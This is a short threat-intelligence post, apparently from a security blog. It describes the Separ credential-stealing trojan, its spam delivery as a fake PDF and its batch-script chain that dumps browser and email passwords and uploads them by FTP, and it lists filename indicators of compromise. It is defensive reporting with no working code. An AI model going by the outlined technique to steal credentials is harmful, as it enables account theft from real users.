This trojan was first observed in late 2017, but has recently been updated. Separ is an information stealing trojan that uses several legitimate applications to obtain user and system data.
Separ is distributed via spam campaigns as a self-extracting EXE file disguised as a PDF document. The emails allude to pricing quotes, shipments and equipment specs in order to trick business recipients into opening these attachments.
When opened, a VBScript script is initiated to execute a batch script. This first batch script will create multiple new directories and copy several files to them before executing a second batch script.
This second batch script will then open an empty JPG file to hide command windows before altering Windows Firewall settings. It will then use the legitimate Email and Browser Password Dump tools created by SecurityXploded to extract mail and browser account credentials. Network information is also collected using the ipconfig utility. This information is then uploaded over FTP to a well-known file hosting platform using a version of the commercial NcFTP client.
Indicators of Compromise
- adobel.vbs – Initial VBScript file
- adob01.bat – First batch file
- adob02.bat – Second batch file
- adobepdf.exe – Browser password extract
- adobepdf2.exe – Email password extract
SHA256 File Hashes
Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.